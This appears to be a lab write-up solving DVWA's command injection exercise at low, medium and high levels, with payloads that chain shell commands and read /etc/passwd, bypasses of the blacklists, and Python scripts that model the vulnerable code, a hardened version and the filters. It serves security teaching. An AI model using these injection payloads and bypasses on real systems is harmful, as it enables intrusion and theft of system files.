DVWA vulnerability: Command Injection

Hey guys, our second vulnerability is Command Injection, starting at the low security level. So let's start.

So this is the interface:

LOW

Let's first check the source code for low:

We can see that the code never checks whether the target is actually an IP address, and it does no filtering of special characters before concatenating the input straight into the ping command string. In a Unix/Linux shell, ; separates commands, so anything we put after it runs as a second command.

Let’s try pinging 127.0.0.1 and see the output:

It is pinging. Now let's append a command after the address and see whether we can list files:

127.0.0.1; ls -al

ls -al lists all the files in the current directory (long format, hidden files included):

It's working. Now let's read /etc/passwd with cat. Note that this file only lists the local accounts and their shells; the actual password hashes live in /etc/shadow, which the web server user normally cannot read.

As you can see, it's working and the file contents come back in the response. That means our command injection payload executed successfully.
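To make the low-level bug concrete, here is an added Python example (not DVWA's PHP and not the post's original code) that simulates the low.php pattern and puts a hardened version next to it. It assumes a Unix shell and uses echo in place of ping so that it runs offline; the function names and the PING_STANDIN constant are assumptions made for the demo.

```python
"""Added example: DVWA low's command-injection pattern beside a hardened version.

DVWA low does  shell_exec("ping -c 4 " . $_REQUEST['ip'])  with no validation.
run_low() reproduces that with subprocess and shell=True. To keep the demo
offline, 'echo' stands in for 'ping' (assumption): the injection behaves the
same, because it is the shell, not the program, that interprets ';' and '|'.
"""
import ipaddress
import subprocess

PING_STANDIN = "echo"  # assumption for the demo; "ping" on a real host


def low_shell_string(target: str) -> str:
    """Mirror of DVWA low.php: raw concatenation into one shell command line."""
    return f"{PING_STANDIN} -c 4 {target}"


def run_low(target: str) -> str:
    """Vulnerable: the whole string is handed to /bin/sh, so metacharacters in
    'target' (; | & $( ` ...) are parsed as shell syntax, not as data."""
    result = subprocess.run(low_shell_string(target), shell=True,
                            capture_output=True, text=True)
    return result.stdout


def validate_target(target: str) -> str:
    """Allow-list check: accept only a literal IPv4/IPv6 address.
    Separators, hostnames and option flags all raise ValueError."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError as exc:
        raise ValueError(f"not an IP address: {target!r}") from exc


def hardened_argv(target: str) -> list[str]:
    """Build an argument vector instead of a string. Without shell=True there
    is no shell to parse separators, and the validated address is one argv
    entry, so it cannot become a second command or an extra option."""
    return [PING_STANDIN, "-c", "4", validate_target(target)]


def run_hardened(target: str) -> str:
    result = subprocess.run(hardened_argv(target), capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print(run_low("127.0.0.1; echo INJECTED"))   # both commands run
    print(run_low("127.0.0.1 | echo INJECTED"))  # only the right side prints
    print(run_hardened("127.0.0.1"))
    try:
        run_hardened("127.0.0.1; echo INJECTED")
    except ValueError as e:
        print("rejected:", e)
```

The second run_low call also shows why a pipe payload in DVWA only displays the injected command's output: the ping output goes into the right-hand command's stdin, which pwd, cat and friends ignore. The hardened version combines both fixes the low source is missing, an allow-list on the value and no shell at all.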

Happy Hacking !!!

Now we're going to look at command injection on the medium security level. The interface is the same.

Let’s see the source code first.

As you can clearly see, two separators are blacklisted: ; and &&. The blacklist is just a string replacement, so any separator that is not on the list still works; we can use the | (pipe) symbol to get our command executed. Let's first start with a normal ping command.

Normal output. Let's now try the command below with ;

127.0.0.1 ; pwd

Nothing happened, because the ; was stripped before the command ran. Now let's try the same thing with |

127.0.0.1 | pwd

pwd prints the present working directory:

It says /var/www/html/vulnerabilities/exec

That means the pipe symbol (|) is working. Only pwd's output appears because the ping output is piped into pwd's stdin, which pwd ignores. You can also use ||, with one caveat: || only runs the right-hand command when the left-hand one fails, so pair it with an address that ping cannot reach rather than 127.0.0.1. A single & is not on the medium blacklist either. Let's cat the /etc/passwd file to solve the lab.

HAPPY HACKING !!!!

Now let's try command injection on the high security level.

First, let's view the source code:

As you can see, all the usual separators that lead to command injection are on the blacklist. At first glance it looks as if the only option left is something indirect like a netcat reverse shell, but it is worth looking at exactly how each blacklist entry is written before giving up on direct injection.

Starting off with a normal ping:

Now all the symbols we could use to chain commands are filtered out. But let's remove the spaces around the pipe and see whether that works. I'm trying this at random.

Here is the output:

It worked! I honestly didn't expect it to get past the filter. The reason is in the blacklist itself: the high-level filter removes the string "| " (a pipe followed by a space), not a bare "|", so 127.0.0.1|pwd passes through untouched while 127.0.0.1 | pwd does not. Now, to grab the /etc/passwd file, I am going to use Burp Suite.

I looked at the HTTP history and sent the request to Repeater to perform more tests. The browser URL-encodes | as %7C; let's try to grab the /etc/passwd file.

The payload in the ip parameter is:

127.0.0.1%7Ccat%20/etc/passwd

%7C = |
%20 = space

There is no space between %7C and cat, so the decoded value contains a bare pipe that the filter does not match; the %20 after cat is harmless because only a space directly after the pipe matters.

Here is the output:

Hence we've solved all three security levels of the Command Injection vulnerability.
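To tie the medium and high bypasses together, here is a small Python script added to this write-up (it is not DVWA code and not the post's original code) that re-implements the two blacklists so payloads can be checked offline before they are sent. The blacklist entries and their order are copied from DVWA's medium.php and high.php and the filter mimics PHP's str_replace with arrays; the function names, the SEPARATORS list and the sample payloads are assumptions made for the demo.

```python
"""Added example: offline re-implementation of DVWA's medium and high blacklists.

DVWA's PHP does str_replace(array_keys($substitutions), $substitutions, $target):
each key is removed from the whole string, one key after another, in table
order. apply_filter() reproduces that order-dependent behaviour.
"""
from urllib.parse import unquote_plus

# medium.php: only two separators are blacklisted.
MEDIUM_BLACKLIST = ("&&", ";")

# high.php, in the original order. The third entry is a pipe FOLLOWED BY A
# SPACE; a bare pipe is never matched. Order matters too: '| ' runs before '||'.
HIGH_BLACKLIST = ("&", ";", "| ", "-", "$(", "(", ")", "`", "||")

# Tokens that would let a second command into the shell line (assumption).
SEPARATORS = (";", "|", "&", "`", "$(")


def apply_filter(target: str, blacklist: tuple[str, ...]) -> str:
    """Sequential whole-string removal, as PHP str_replace does with arrays."""
    for token in blacklist:
        target = target.replace(token, "")
    return target


def shell_line(filtered_target: str) -> str:
    """What DVWA finally hands to shell_exec() on Linux at every level."""
    return "ping -c 4 " + filtered_target


def check_payload(encoded: str, blacklist: tuple[str, ...]) -> dict:
    """Decode a URL-encoded 'ip' value (as Burp shows it), run it through the
    level's blacklist and report whether a separator survived."""
    decoded = unquote_plus(encoded)
    filtered = apply_filter(decoded, blacklist)
    return {
        "decoded": decoded,
        "filtered": filtered,
        "command": shell_line(filtered),
        "injects": any(sep in filtered for sep in SEPARATORS),
    }


if __name__ == "__main__":
    cases = [  # constructed sample payloads
        ("medium", "127.0.0.1%20%3B%20pwd", MEDIUM_BLACKLIST),      # ; stripped
        ("medium", "127.0.0.1%20%7C%20pwd", MEDIUM_BLACKLIST),      # | survives
        ("high",   "127.0.0.1%20%7C%20pwd", HIGH_BLACKLIST),        # '| ' stripped
        ("high",   "127.0.0.1%7Cpwd", HIGH_BLACKLIST),              # bare | survives
        ("high",   "127.0.0.1%7Ccat%20/etc/passwd", HIGH_BLACKLIST),
        ("high",   "127.0.0.1%7Cls%20-al", HIGH_BLACKLIST),         # '-' is stripped
        ("high",   "127.0.0.1%20%7C%7C%20pwd", HIGH_BLACKLIST),     # order effect
    ]
    for level, payload, bl in cases:
        r = check_payload(payload, bl)
        print(f"{level:6} {payload!r:36} -> {r['command']!r}  injects={r['injects']}")
```

Two things the script makes visible that are easy to miss when testing by hand: on high, the single - entry also strips option flags, so 127.0.0.1|ls -al reaches the shell as ping -c 4 127.0.0.1|ls al; and because '| ' is processed before '||', the input 127.0.0.1 || pwd loses only the second pipe and its space, leaving 127.0.0.1 |pwd, which is a live pipe again.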

HAPPY HACKING !!!!
